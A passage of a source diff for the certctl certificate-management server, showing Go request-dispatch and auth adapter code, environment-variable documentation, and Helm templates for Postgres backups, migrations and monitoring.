// request's URL path and forwards the request to exactly one of: the
// unauthenticated chain (noAuthHandler), the authenticated chain (apiHandler),
// the static file server, or the SPA index.html fallback. It lives outside
// main() so the dispatch table can be unit tested on its own.
//
// Dispatch rules, evaluated top to bottom (M-001, audit 2026-04-19, option D):
//
//   - /health, /ready, /api/v1/auth/info, /api/v1/version → noAuthHandler
//   - any path starting with /.well-known/pki             → noAuthHandler
//   - any path starting with /.well-known/est             → noAuthHandler
//   - /scep, /scep/*, /scep-mtls, /scep-mtls/*            → noAuthHandler
//   - /api/v1/*                                           → apiHandler
//   - dashboard disabled: everything else                 → apiHandler
//   - dashboard enabled: /assets/*                        → file server on webDir
//   - dashboard enabled: everything else                  → webDir/index.html
//
// The enrollment and PKI endpoints bypass the Bearer-token middleware because
// their clients cannot present certctl tokens; whatever authentication they
// need is enforced inside the handlers on the no-auth chain.
//
// webDir is only used when dashboardEnabled is true and must then contain
// index.html and an assets/ directory.
func buildFinalHandler(apiHandler, noAuthHandler http.Handler, webDir string, dashboardEnabled bool) http.Handler {
	// The file server is only built (and only ever reached) with the
	// dashboard on.
	var static http.Handler
	if dashboardEnabled {
		static = http.FileServer(http.Dir(webDir))
	}

	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		p := r.URL.Path

		switch {
		// Exact-match public endpoints: liveness/readiness probes, the
		// pre-login auth-mode probe, and the build-identity endpoint.
		case p == "/health", p == "/ready", p == "/api/v1/auth/info", p == "/api/v1/version":
			noAuthHandler.ServeHTTP(w, r)

		// CRL / OCSP distribution (RFC 5280, RFC 6960) for relying parties.
		case strings.HasPrefix(p, "/.well-known/pki"):
			noAuthHandler.ServeHTTP(w, r)

		// RFC 7030 EST. This is a plain prefix match, so the sibling
		// /.well-known/est-mtls/... routes are covered by the same case.
		case strings.HasPrefix(p, "/.well-known/est"):
			noAuthHandler.ServeHTTP(w, r)

		// RFC 8894 SCEP and its mTLS sibling. Each is matched exactly or
		// with a trailing "/", so look-alike paths such as /scepxyz do not
		// land on the no-auth chain.
		case p == "/scep", strings.HasPrefix(p, "/scep/"):
			noAuthHandler.ServeHTTP(w, r)
		case p == "/scep-mtls", strings.HasPrefix(p, "/scep-mtls/"):
			noAuthHandler.ServeHTTP(w, r)

		// Everything else under the API prefix takes the full middleware
		// stack, including auth.
		case strings.HasPrefix(p, "/api/v1/"):
			apiHandler.ServeHTTP(w, r)

		// API-only deployment: unknown paths go to the authenticated chain
		// (preserves pre-M-001 behavior).
		case !dashboardEnabled:
			apiHandler.ServeHTTP(w, r)

		// Dashboard deployment: static assets come straight from disk...
		case strings.HasPrefix(p, "/assets/"):
			static.ServeHTTP(w, r)

		// ...and any other path is answered with the SPA entry page.
		default:
			http.ServeFile(w, r, webDir+"/index.html")
		}
	})
}
|
||||||
|
|
||||||
|
// authPermissionCheckerAdapter bridges the typed-string Authorizer
|
||||||
|
// signature (authsvc.Authorizer.CheckPermission takes
|
||||||
|
// authdomain.ActorTypeValue + authdomain.ScopeType) to the plain-string
|
||||||
|
// auth.PermissionChecker interface used by the auth.RequirePermission
|
||||||
|
// middleware factory. Lives in cmd/server so internal/auth doesn't have
|
||||||
|
// to import internal/service/auth + internal/domain/auth (would create
|
||||||
|
// a cycle).
|
||||||
|
type authPermissionCheckerAdapter struct {
|
||||||
|
a *authsvc.Authorizer
|
||||||
|
}
|
||||||
|
|
||||||
|
func (ad authPermissionCheckerAdapter) CheckPermission(
|
||||||
|
ctx context.Context,
|
||||||
|
actorID string,
|
||||||
|
actorType string,
|
||||||
|
tenantID string,
|
||||||
|
permission string,
|
||||||
|
scopeType string,
|
||||||
|
scopeID *string,
|
||||||
|
) (bool, error) {
|
||||||
|
return ad.a.CheckPermission(
|
||||||
|
ctx,
|
||||||
|
actorID,
|
||||||
|
authdomainAlias.ActorTypeValue(actorType),
|
||||||
|
tenantID,
|
||||||
|
permission,
|
||||||
|
authdomainAlias.ScopeType(scopeType),
|
||||||
|
scopeID,
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
// authCheckResolverAdapter bridges the postgres ActorRoleRepository
|
||||||
|
// (authdomain.ActorTypeValue) to handler.AuthCheckResolver
|
||||||
|
// (domain.ActorType). Lives in cmd/server so the handler layer keeps its
|
||||||
|
// existing import set; the GUI's /v1/auth/check probe round-trips
|
||||||
|
// through this on every page load. Read-only — no caller / no audit row.
|
||||||
|
//
|
||||||
|
// Bundle 1 Phase 3 closure (M1): the equivalent surface area on
|
||||||
|
// /v1/auth/me runs through the service layer's auth.role.list permission
|
||||||
|
// gate, which the GUI may not yet hold during initial render. AuthCheck
|
||||||
|
// has no permission gate (its only requirement is "the request
|
||||||
|
// authenticated"), so the bypass is by design.
|
||||||
|
type authCheckResolverAdapter struct {
|
||||||
|
repo *postgres.ActorRoleRepository
|
||||||
|
}
|
||||||
|
|
||||||
|
func (ad authCheckResolverAdapter) ListRoles(
|
||||||
|
ctx context.Context,
|
||||||
|
actorID string,
|
||||||
|
actorType domain.ActorType,
|
||||||
|
tenantID string,
|
||||||
|
) ([]*authdomainAlias.ActorRole, error) {
|
||||||
|
return ad.repo.ListByActor(ctx, actorID, authdomainAlias.ActorTypeValue(actorType), tenantID)
|
||||||
|
}
|
||||||
|
|
||||||
|
func (ad authCheckResolverAdapter) EffectivePermissions(
|
||||||
|
ctx context.Context,
|
||||||
|
actorID string,
|
||||||
|
actorType domain.ActorType,
|
||||||
|
tenantID string,
|
||||||
|
) ([]repository.EffectivePermission, error) {
|
||||||
|
return ad.repo.EffectivePermissions(ctx, actorID, authdomainAlias.ActorTypeValue(actorType), tenantID)
|
||||||
|
}
|
||||||
|
|
||||||
|
// =============================================================================
// sessionMinterAdapter — bridge from *session.Service to oidcsvc.SessionMinter.
//
// The OIDC service's SessionMinter port (Phase 3) takes a *userdomain.User
// + role IDs and returns (cookie, csrf, err). The session.Service's
// Create method takes (actorID, actorType, ip, ua) -> *CreateResult.
// This adapter unwraps the User into actorID/actorType + reshapes the
// return tuple. Lives in cmd/server so the session package doesn't have
// to know about user.User and the user package doesn't have to know
// about session.CreateResult.
// =============================================================================

type sessionMinterAdapter struct {
	// svc is the session service whose Create method MintForUser calls.
	svc *session.Service
}
|
||||||
|
|
||||||
|
func (a *sessionMinterAdapter) MintForUser(
|
||||||
|
ctx context.Context,
|
||||||
|
user *userdomain.User,
|
||||||
|
_ []string, // roleIDs unused at the session-mint layer; the rbac middleware looks them up at request time
|
||||||
|
ip, userAgent string,
|
||||||
|
) (cookieValue, csrfToken string, err error) {
|
||||||
|
if user == nil {
|
||||||
|
return "", "", fmt.Errorf("session mint: user is nil")
|
||||||
|
}
|
||||||
|
res, err := a.svc.Create(ctx, user.ID, string(domain.ActorTypeUser), ip, userAgent)
|
||||||
|
if err != nil {
|
||||||
|
return "", "", err
|
||||||
|
}
|
||||||
|
return res.CookieValue, res.CSRFToken, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// silenceUnusedImports keeps the new oidcsvc + oidcdomain imports load-
// bearing in case any file shuffles. Linker dead-code elimination handles
// the runtime cost.
//
// NOTE(review): only oidcdomain is actually referenced by this block; the
// oidcsvc import is not pinned here — confirm it is used elsewhere in the
// file.
var (
	// Blank-assigned zero value: exists solely to reference the
	// oidcdomain package.
	_ = oidcdomain.OIDCProvider{}
)
|
||||||
|
|
||||||
|
// =============================================================================
// breakglassSessionMinterAdapter — bridge from *session.Service to
// breakglass.SessionMinter.
//
// The break-glass service's SessionMinter port (Phase 7.5) returns
// (cookie, csrf, err); the underlying *session.Service.Create returns
// *CreateResult. This adapter unwraps the result. Lives in cmd/server
// so the breakglass package doesn't have to know about session.Service.
// =============================================================================

type breakglassSessionMinterAdapter struct {
	// svc is the session service that Create and RevokeAllForActor
	// delegate to.
	svc *session.Service
}
|
||||||
|
|
||||||
|
func (a breakglassSessionMinterAdapter) Create(ctx context.Context, actorID, actorType, ip, userAgent string) (string, string, error) {
|
||||||
|
res, err := a.svc.Create(ctx, actorID, actorType, ip, userAgent)
|
||||||
|
if err != nil {
|
||||||
|
return "", "", err
|
||||||
|
}
|
||||||
|
return res.CookieValue, res.CSRFToken, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// RevokeAllForActor — Audit 2026-05-10 HIGH-1 wire. After a break-glass
|
||||||
|
// password rotation or credential removal, every active session for the
|
||||||
|
// target actor must be revoked so a phished-then-rotated credential
|
||||||
|
// doesn't leave the attacker's session live.
|
||||||
|
func (a breakglassSessionMinterAdapter) RevokeAllForActor(ctx context.Context, actorID, actorType string) error {
|
||||||
|
return a.svc.RevokeAllForActor(ctx, actorID, actorType)
|
||||||
|
}
|
||||||
|
|
||||||
|
// oidcProvidersListAdapter bridges the postgres OIDCProviderRepository
// to handler.OIDCProvidersListResolver. The handler returns
// []*OIDCProviderInfo (id + display_name + login_url) for the public-
// safe GUI Login-page payload; the repo returns the full OIDCProvider
// row. The adapter projects + maps the login_url shape that
// /auth/oidc/login?provider=<id> expects. Auth Bundle 2 Phase 6 /
// Category E.
type oidcProvidersListAdapter struct {
	// repo supplies the provider rows that List filters and projects.
	repo repository.OIDCProviderRepository
}
|
||||||
|
|
||||||
|
func (a oidcProvidersListAdapter) List(ctx context.Context, tenantID string) ([]*handler.OIDCProviderInfo, error) {
|
||||||
|
provs, err := a.repo.List(ctx, tenantID)
|
||||||
|
if err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
out := make([]*handler.OIDCProviderInfo, 0, len(provs))
|
||||||
|
for _, p := range provs {
|
||||||
|
// Audit 2026-05-10 MED-9 closure — filter disabled providers
|
||||||
|
// at the adapter so the LoginPage's "Sign in with X" buttons
|
||||||
|
// don't render for offline IdPs. The HandleAuthRequest
|
||||||
|
// service-layer ErrProviderDisabled check is the
|
||||||
|
// defense-in-depth guard for direct API / MCP / CLI callers.
|
||||||
|
if !p.Enabled {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
out = append(out, &handler.OIDCProviderInfo{
|
||||||
|
ID: p.ID,
|
||||||
|
DisplayName: p.Name,
|
||||||
|
LoginURL: "/auth/oidc/login?provider=" + p.ID,
|
||||||
|
})
|
||||||
|
}
|
||||||
|
return out, nil
|
||||||
|
}
|
||||||
@@ -422,6 +422,8 @@ Every `CERTCTL_*` environment variable is read by the server's `internal/config/
|
|||||||
| `CERTCTL_DEMO_MODE_ACK` | `false` | Acknowledges demo-mode synthetic admin posture (required when `CERTCTL_AUTH_TYPE=none` binds to a non-loopback host). Must be paired with `CERTCTL_DEMO_MODE_ACK_TS` per Phase 2 SEC-H3. |
|
| `CERTCTL_DEMO_MODE_ACK` | `false` | Acknowledges demo-mode synthetic admin posture (required when `CERTCTL_AUTH_TYPE=none` binds to a non-loopback host). Must be paired with `CERTCTL_DEMO_MODE_ACK_TS` per Phase 2 SEC-H3. |
|
||||||
| `CERTCTL_DEMO_MODE_ACK_TS` | (empty) | Phase 2 SEC-H3: unix-epoch timestamp at which DemoModeAck was last acknowledged. When `CERTCTL_DEMO_MODE_ACK=true`, this must parse as a unix epoch within the last 24h. Set via `CERTCTL_DEMO_MODE_ACK_TS=$(date +%s)` at every `docker compose up`. |
|
| `CERTCTL_DEMO_MODE_ACK_TS` | (empty) | Phase 2 SEC-H3: unix-epoch timestamp at which DemoModeAck was last acknowledged. When `CERTCTL_DEMO_MODE_ACK=true`, this must parse as a unix epoch within the last 24h. Set via `CERTCTL_DEMO_MODE_ACK_TS=$(date +%s)` at every `docker compose up`. |
|
||||||
| `CERTCTL_ACME_INSECURE_ACK` | `false` | Phase 2 SEC-M4: explicit ACK required to boot with `CERTCTL_ACME_INSECURE=true`. Production deploys MUST never set either flag. |
|
| `CERTCTL_ACME_INSECURE_ACK` | `false` | Phase 2 SEC-M4: explicit ACK required to boot with `CERTCTL_ACME_INSECURE=true`. Production deploys MUST never set either flag. |
|
||||||
|
| `CERTCTL_DATABASE_MAX_CONNS` | `50` | Phase 6 SCALE-M1: max open DB connections in the server's pool. Default was `25` pre-Phase-6. Idle connections = max/5. Operator-tune ladder for larger fleets: ≤500 certs → 50; 5K certs → 100; 50K certs → 200 (also raise Postgres `max_connections`). See `docs/operator/scale.md`. |
|
||||||
|
| `CERTCTL_ASYNC_POLL_MAX_WAIT_SECONDS` | (unset → 600) | Phase 6 SCALE-M3: process-wide override for the asyncpoll package's `DefaultMaxWait` (10 minutes). Caps total wall-clock time the certctl-server spends polling an async CA (DigiCert / Entrust / GlobalSign / Sectigo) before returning `StillPending` to the scheduler for re-enqueue. Per-connector overrides (`CERTCTL_DIGICERT_POLL_MAX_WAIT_SECONDS`, etc.) take precedence when set. |
|
||||||
|
|
||||||
### Agent
|
### Agent
|
||||||
|
|
||||||
|
|||||||
@@ -0,0 +1,178 @@
|
|||||||
|
{{- /*
|
||||||
|
Phase 4 DEPL-H2 closure (2026-05-14): opt-in Helm CronJob for
|
||||||
|
PostgreSQL backups.
|
||||||
|
|
||||||
|
OPERATOR OPT-IN. Default `backup.enabled: false`. Turning it on
|
||||||
|
requires:
|
||||||
|
- In-cluster Postgres (this CronJob does NOT cover managed DB
|
||||||
|
services — for AWS RDS / GCP CloudSQL / Azure DB rely on the
|
||||||
|
provider's PITR).
|
||||||
|
- A sink choice (PVC or S3) configured in values.yaml.
|
||||||
|
- For S3: a Secret holding AWS_ACCESS_KEY_ID + AWS_SECRET_ACCESS_KEY
|
||||||
|
(or use a service account with IRSA on EKS).
|
||||||
|
|
||||||
|
The pg_dump invocation matches the canonical shape documented in
|
||||||
|
docs/operator/runbooks/postgres-backup.md so a manual run and a
|
||||||
|
CronJob run produce equivalent dumps (same format and flags):
|
||||||
|
|
||||||
|
pg_dump --format=custom --no-owner --no-acl --dbname=certctl
|
||||||
|
|
||||||
|
For sink choices beyond PVC + S3 (GCS, Azure Blob, NFS, restic, etc.),
|
||||||
|
extend the `aws s3 cp` line below. The Job is intentionally minimal —
|
||||||
|
it does ONE thing (capture + ship), not orchestrate retention or
|
||||||
|
rotation. Off-host retention is the sink's responsibility (S3 lifecycle
|
||||||
|
rules, PVC snapshot retention on the storage class, etc.).
|
||||||
|
*/ -}}
|
||||||
|
{{- if .Values.backup.enabled }}
|
||||||
|
apiVersion: batch/v1
|
||||||
|
kind: CronJob
|
||||||
|
metadata:
|
||||||
|
name: {{ include "certctl.fullname" . }}-postgres-backup
|
||||||
|
labels:
|
||||||
|
{{- include "certctl.labels" . | nindent 4 }}
|
||||||
|
app.kubernetes.io/component: postgres-backup
|
||||||
|
spec:
|
||||||
|
schedule: {{ .Values.backup.schedule | quote }}
|
||||||
|
concurrencyPolicy: Forbid
|
||||||
|
successfulJobsHistoryLimit: {{ .Values.backup.successfulJobsHistoryLimit | default 3 }}
|
||||||
|
failedJobsHistoryLimit: {{ .Values.backup.failedJobsHistoryLimit | default 1 }}
|
||||||
|
startingDeadlineSeconds: {{ .Values.backup.startingDeadlineSeconds | default 300 }}
|
||||||
|
jobTemplate:
|
||||||
|
spec:
|
||||||
|
backoffLimit: {{ .Values.backup.backoffLimit | default 1 }}
|
||||||
|
activeDeadlineSeconds: {{ .Values.backup.activeDeadlineSeconds | default 3600 }}
|
||||||
|
template:
|
||||||
|
metadata:
|
||||||
|
labels:
|
||||||
|
{{- include "certctl.labels" . | nindent 12 }}
|
||||||
|
app.kubernetes.io/component: postgres-backup
|
||||||
|
spec:
|
||||||
|
restartPolicy: Never
|
||||||
|
{{- with .Values.imagePullSecrets }}
|
||||||
|
imagePullSecrets:
|
||||||
|
{{- toYaml . | nindent 12 }}
|
||||||
|
{{- end }}
|
||||||
|
serviceAccountName: {{ include "certctl.serviceAccountName" . }}
|
||||||
|
securityContext:
|
||||||
|
runAsUser: 1000
|
||||||
|
runAsGroup: 1000
|
||||||
|
runAsNonRoot: true
|
||||||
|
fsGroup: 1000
|
||||||
|
containers:
|
||||||
|
- name: backup
|
||||||
|
image: {{ .Values.backup.image | default "postgres:16-alpine" | quote }}
|
||||||
|
imagePullPolicy: {{ .Values.backup.imagePullPolicy | default "IfNotPresent" | quote }}
|
||||||
|
env:
|
||||||
|
- name: PGHOST
|
||||||
|
value: {{ include "certctl.fullname" . }}-postgres
|
||||||
|
- name: PGPORT
|
||||||
|
value: {{ .Values.postgresql.service.port | default 5432 | quote }}
|
||||||
|
- name: PGUSER
|
||||||
|
valueFrom:
|
||||||
|
secretKeyRef:
|
||||||
|
name: {{ include "certctl.fullname" . }}-postgres
|
||||||
|
key: username
|
||||||
|
- name: PGPASSWORD
|
||||||
|
valueFrom:
|
||||||
|
secretKeyRef:
|
||||||
|
name: {{ include "certctl.fullname" . }}-postgres
|
||||||
|
key: password
|
||||||
|
- name: PGDATABASE
|
||||||
|
valueFrom:
|
||||||
|
secretKeyRef:
|
||||||
|
name: {{ include "certctl.fullname" . }}-postgres
|
||||||
|
key: database
|
||||||
|
{{- if eq (.Values.backup.sink | default "pvc") "s3" }}
|
||||||
|
# S3 sink — operator provides AWS credentials via the
|
||||||
|
# Secret referenced in backup.s3.credentialsSecret. The
|
||||||
|
# credentials need s3:PutObject + s3:ListBucket on the
|
||||||
|
# target bucket only; least-privilege per industry
|
||||||
|
# standard.
|
||||||
|
- name: AWS_ACCESS_KEY_ID
|
||||||
|
valueFrom:
|
||||||
|
secretKeyRef:
|
||||||
|
name: {{ .Values.backup.s3.credentialsSecret.name | quote }}
|
||||||
|
key: {{ .Values.backup.s3.credentialsSecret.accessKeyIdKey | default "AWS_ACCESS_KEY_ID" }}
|
||||||
|
- name: AWS_SECRET_ACCESS_KEY
|
||||||
|
valueFrom:
|
||||||
|
secretKeyRef:
|
||||||
|
name: {{ .Values.backup.s3.credentialsSecret.name | quote }}
|
||||||
|
key: {{ .Values.backup.s3.credentialsSecret.secretAccessKeyKey | default "AWS_SECRET_ACCESS_KEY" }}
|
||||||
|
{{- with .Values.backup.s3.region }}
|
||||||
|
- name: AWS_DEFAULT_REGION
|
||||||
|
value: {{ . | quote }}
|
||||||
|
{{- end }}
|
||||||
|
{{- end }}
|
||||||
|
command:
|
||||||
|
- /bin/sh
|
||||||
|
- -ceu
|
||||||
|
- |
|
||||||
|
# Phase 4 DEPL-H2: canonical pg_dump shape per
|
||||||
|
# docs/operator/runbooks/postgres-backup.md.
|
||||||
|
# Custom-format compressed dump, no ownership /
|
||||||
|
# ACL embedded — produces a portable artifact
|
||||||
|
# restorable into any Postgres ≥ source major
|
||||||
|
# via `pg_restore -d certctl <dump>`.
|
||||||
|
set -euo pipefail
|
||||||
|
TIMESTAMP="$(date -u +%Y%m%dT%H%M%SZ)"
|
||||||
|
DUMP_FILE="/tmp/certctl-${TIMESTAMP}.dump"
|
||||||
|
|
||||||
|
echo "[backup-cronjob] capturing dump at ${TIMESTAMP}"
|
||||||
|
pg_dump --format=custom --no-owner --no-acl --dbname="${PGDATABASE}" \
|
||||||
|
> "${DUMP_FILE}"
|
||||||
|
|
||||||
|
# Integrity check — pg_restore --list parses the
|
||||||
|
# dump's table-of-contents; a corrupt dump fails
|
||||||
|
# here without shipping garbage off-host. Same
|
||||||
|
# check the manual runbook performs.
|
||||||
|
echo "[backup-cronjob] verifying dump integrity"
|
||||||
|
pg_restore --list "${DUMP_FILE}" > /dev/null
|
||||||
|
|
||||||
|
{{- if eq (.Values.backup.sink | default "pvc") "s3" }}
|
||||||
|
# S3 sink — requires aws-cli. The default
|
||||||
|
# postgres:16-alpine image does NOT include
|
||||||
|
# aws-cli; operators MUST set
|
||||||
|
# backup.image to an image that bundles both
|
||||||
|
# (e.g. ghcr.io/your-org/postgres-aws:16) OR
|
||||||
|
# override backup.command to install aws-cli at
|
||||||
|
# runtime. The line below assumes the image has
|
||||||
|
# `aws` on PATH.
|
||||||
|
S3_PATH="{{ .Values.backup.s3.bucket }}/{{ .Values.backup.s3.prefix | default "certctl" }}/certctl-${TIMESTAMP}.dump"
|
||||||
|
echo "[backup-cronjob] uploading to s3://${S3_PATH}"
|
||||||
|
aws s3 cp "${DUMP_FILE}" "s3://${S3_PATH}"
|
||||||
|
rm -f "${DUMP_FILE}"
|
||||||
|
{{- else }}
|
||||||
|
# PVC sink — dump lands at /backups/certctl-${TIMESTAMP}.dump
# mounted from backup.pvc.claimName. Retention is the
# PVC's responsibility (storage-class snapshot lifecycle
# or a separate cleanup CronJob).
#
# /tmp lives on the container filesystem and /backups on
# the PVC, so a direct `mv` between them is a copy +
# unlink, not a rename, and a pod killed mid-copy would
# leave a truncated certctl-*.dump on the durable mount.
# Stage the copy under a .partial name on the PVC, then
# rename it into place: a rename within one filesystem is
# atomic, so any certctl-*.dump on the PVC is complete.
FINAL_PATH="/backups/certctl-${TIMESTAMP}.dump"
echo "[backup-cronjob] persisting to ${FINAL_PATH}"
cp "${DUMP_FILE}" "${FINAL_PATH}.partial"
mv "${FINAL_PATH}.partial" "${FINAL_PATH}"
rm -f "${DUMP_FILE}"
|
||||||
|
{{- end }}
|
||||||
|
echo "[backup-cronjob] done"
|
||||||
|
{{- if ne (.Values.backup.sink | default "pvc") "s3" }}
|
||||||
|
volumeMounts:
|
||||||
|
- name: backups
|
||||||
|
mountPath: /backups
|
||||||
|
{{- end }}
|
||||||
|
resources:
|
||||||
|
{{- toYaml (.Values.backup.resources | default dict) | nindent 16 }}
|
||||||
|
{{- if ne (.Values.backup.sink | default "pvc") "s3" }}
|
||||||
|
volumes:
|
||||||
|
- name: backups
|
||||||
|
persistentVolumeClaim:
|
||||||
|
claimName: {{ .Values.backup.pvc.claimName | quote }}
|
||||||
|
{{- end }}
|
||||||
|
{{- with .Values.nodeAffinity }}
|
||||||
|
affinity:
|
||||||
|
nodeAffinity:
|
||||||
|
{{- toYaml . | nindent 14 }}
|
||||||
|
{{- end }}
|
||||||
|
{{- with .Values.backup.tolerations }}
|
||||||
|
tolerations:
|
||||||
|
{{- toYaml . | nindent 12 }}
|
||||||
|
{{- end }}
|
||||||
|
{{- end }}
|
||||||
@@ -0,0 +1,89 @@
|
|||||||
|
{{- /*
|
||||||
|
Phase 4 DEPL-M1 closure (2026-05-14): Helm pre-install / pre-upgrade
|
||||||
|
hook that runs Postgres migrations before the server Deployment rolls.
|
||||||
|
|
||||||
|
Pre-DEPL-M1, postgres.RunMigrations was invoked at server boot
|
||||||
|
(cmd/server/main.go:151) as the only migration path. That works for
|
||||||
|
Compose deployments but conflicts with Kubernetes rolling deploys:
|
||||||
|
when a new server image lands with a schema change, multiple replicas
|
||||||
|
race the migration during the rollout. The hook resolves the race by
|
||||||
|
running migrations OUT OF BAND, exactly once, before any new server
|
||||||
|
pod starts.
|
||||||
|
|
||||||
|
How it works:
|
||||||
|
- The Job ships the same certctl-server image as the Deployment, so
|
||||||
|
the migration code path is binary-identical to the boot-time path.
|
||||||
|
- It runs `certctl-server --migrate-only` (a flag the cmd/server
|
||||||
|
main process must support — see cmd/server/main.go for the flag
|
||||||
|
parse + early-exit path).
|
||||||
|
- The CERTCTL_MIGRATIONS_VIA_HOOK=true env var is ALSO set on the
|
||||||
|
server Deployment (via values.yaml). When the server boots, it
|
||||||
|
sees this env var and skips its own RunMigrations call — the
|
||||||
|
hook already did the work. Compose deploys don't set the env
|
||||||
|
var, so they keep the boot-time path unchanged.
|
||||||
|
- hook-delete-policy hook-succeeded means the Job is cleaned up
|
||||||
|
automatically on success but retained on failure for operator
|
||||||
|
diagnosis.
|
||||||
|
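- The hook-weight ("-5") orders this Job ahead of any other
pre-install/pre-upgrade hook resources that carry a higher weight.
NOTE(review): the Postgres StatefulSet (and its PVC) has no hook
annotation, so on a fresh install it is only created in the regular
install phase, i.e. after this pre-install Job has already run. With
the in-chart database the first-install migration therefore has no
Postgres to connect to — confirm how the initial install is expected
to succeed (external DB only, or a different hook phase).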
|
||||||
|
|
||||||
|
Operators on Compose: this hook is a no-op for you. The server still
|
||||||
|
runs migrations at boot per the existing path.
|
||||||
|
*/ -}}
|
||||||
|
{{- if .Values.migrations.viaHook }}
|
||||||
|
apiVersion: batch/v1
|
||||||
|
kind: Job
|
||||||
|
metadata:
|
||||||
|
name: {{ include "certctl.fullname" . }}-migrate
|
||||||
|
labels:
|
||||||
|
{{- include "certctl.labels" . | nindent 4 }}
|
||||||
|
app.kubernetes.io/component: migration
|
||||||
|
annotations:
|
||||||
|
"helm.sh/hook": pre-install,pre-upgrade
|
||||||
|
"helm.sh/hook-weight": "-5"
|
||||||
|
"helm.sh/hook-delete-policy": hook-succeeded,before-hook-creation
|
||||||
|
spec:
|
||||||
|
backoffLimit: {{ .Values.migrations.backoffLimit | default 1 }}
|
||||||
|
activeDeadlineSeconds: {{ .Values.migrations.activeDeadlineSeconds | default 600 }}
|
||||||
|
template:
|
||||||
|
metadata:
|
||||||
|
labels:
|
||||||
|
{{- include "certctl.labels" . | nindent 8 }}
|
||||||
|
app.kubernetes.io/component: migration
|
||||||
|
spec:
|
||||||
|
restartPolicy: Never
|
||||||
|
serviceAccountName: {{ include "certctl.serviceAccountName" . }}
|
||||||
|
securityContext:
|
||||||
|
{{- include "certctl.podSecurityContext" .Values.server.securityContext | nindent 8 }}
|
||||||
|
{{- with .Values.imagePullSecrets }}
|
||||||
|
imagePullSecrets:
|
||||||
|
{{- toYaml . | nindent 8 }}
|
||||||
|
{{- end }}
|
||||||
|
containers:
|
||||||
|
- name: migrate
|
||||||
|
image: {{ include "certctl.serverImage" . }}
|
||||||
|
imagePullPolicy: {{ .Values.server.image.pullPolicy }}
|
||||||
|
# Migration-only entrypoint. The server binary supports a
|
||||||
|
# --migrate-only flag that runs postgres.RunMigrations +
|
||||||
|
# postgres.RunSeed and exits cleanly (zero on success,
|
||||||
|
# non-zero on migration failure). See cmd/server/main.go
|
||||||
|
# for the implementation. The flag is hermetic — no HTTP
|
||||||
|
# listener starts, no scheduler ticks, no signing
|
||||||
|
# operations occur. Pure schema-mutation pass.
|
||||||
|
command:
|
||||||
|
- /app/server
|
||||||
|
- --migrate-only
|
||||||
|
env:
|
||||||
|
- name: CERTCTL_DATABASE_URL
|
||||||
|
value: {{ include "certctl.databaseURL" . | quote }}
|
||||||
|
- name: CERTCTL_LOG_LEVEL
|
||||||
|
value: {{ .Values.server.logging.level | default "info" | quote }}
|
||||||
|
- name: CERTCTL_LOG_FORMAT
|
||||||
|
value: {{ .Values.server.logging.format | default "json" | quote }}
|
||||||
|
resources:
|
||||||
|
{{- toYaml (.Values.migrations.resources | default .Values.server.resources) | nindent 12 }}
|
||||||
|
securityContext:
|
||||||
|
{{- include "certctl.containerSecurityContext" .Values.server.securityContext | nindent 12 }}
|
||||||
|
{{- end }}
|
||||||
@@ -9,6 +9,21 @@ metadata:
|
|||||||
spec:
|
spec:
|
||||||
serviceName: {{ include "certctl.fullname" . }}-postgres
|
serviceName: {{ include "certctl.fullname" . }}-postgres
|
||||||
replicas: 1
|
replicas: 1
|
||||||
|
# Phase 4 DEPL-M4 closure (2026-05-14): explicit StatefulSet update +
|
||||||
|
# pod-management strategies. Defaults make Postgres upgrades
|
||||||
|
# operator-controlled rather than automatic:
|
||||||
|
# updateStrategy.type: OnDelete — Postgres pods do NOT roll
|
||||||
|
# automatically when the StatefulSet spec changes. Operator
|
||||||
|
# deletes the pod explicitly after taking a backup + reviewing
|
||||||
|
# the change. Prevents an accidental Helm-template tweak from
|
||||||
|
# triggering a database restart at an awkward time.
|
||||||
|
# podManagementPolicy: OrderedReady — when scaling Postgres to
|
||||||
|
# more than one replica (future HA work), pods come up one at a time
|
||||||
|
# and must reach Ready before the next pod is created. Aligns
|
||||||
|
# with the standard Postgres-on-Kubernetes pattern.
|
||||||
|
updateStrategy:
|
||||||
|
type: OnDelete
|
||||||
|
podManagementPolicy: OrderedReady
|
||||||
selector:
|
selector:
|
||||||
matchLabels:
|
matchLabels:
|
||||||
{{- include "certctl.postgresSelectorLabels" . | nindent 6 }}
|
{{- include "certctl.postgresSelectorLabels" . | nindent 6 }}
|
||||||
|
|||||||
@@ -0,0 +1,145 @@
|
|||||||
|
{{- /*
|
||||||
|
Phase 4 DEPL-L2 closure (2026-05-14): opt-in Prometheus AlertManager
|
||||||
|
rules covering the four operationally-actionable alerts every certctl
|
||||||
|
deployment wants out of the box.
|
||||||
|
|
||||||
|
OPERATOR OPT-IN. Default `monitoring.prometheusRules.enabled: false`.
|
||||||
|
Turning it on requires Prometheus Operator CRDs (PrometheusRule kind)
|
||||||
|
to be installed in-cluster. Without them this template renders an
|
||||||
|
object Kubernetes will reject — keep the toggle off if you're scraping
|
||||||
|
with vanilla Prometheus + a Helm-installed AlertManager rules
|
||||||
|
ConfigMap instead.
|
||||||
|
|
||||||
|
Metric names + thresholds verified against the actual
|
||||||
|
internal/api/handler/metrics.go exposition path:
|
||||||
|
- certctl_certificate_expiring_soon: server-side count of certs with
|
||||||
|
ExpiresAt in (now, now + 30d]. The 30-day window is computed in
|
||||||
|
internal/service/stats.go::GetDashboardSummary.
|
||||||
|
- certctl_agent_online: agents with heartbeat in the last 5 minutes.
|
||||||
|
A drop below certctl_agent_total signals offline agents.
|
||||||
|
- certctl_job_failed_total + certctl_job_completed_total: cumulative
|
||||||
|
counters; ratio gives the failure rate over the rate() window.
|
||||||
|
- certctl_issuance_failures_total: cumulative counter of failed
|
||||||
|
issuance attempts (renewal failures are issuance failures with a
|
||||||
|
specific error_class label).
|
||||||
|
|
||||||
|
Adjust thresholds per fleet — the defaults below are tuned for the
|
||||||
|
demo dataset (15 certs / 1 agent) and may need raising for production
|
||||||
|
fleets with thousands of certs where a steady rate of expiring certs
|
||||||
|
is the normal operating state.
|
||||||
|
*/ -}}
|
||||||
|
{{- if and .Values.monitoring.enabled .Values.monitoring.prometheusRules.enabled }}
|
||||||
|
apiVersion: monitoring.coreos.com/v1
|
||||||
|
kind: PrometheusRule
|
||||||
|
metadata:
|
||||||
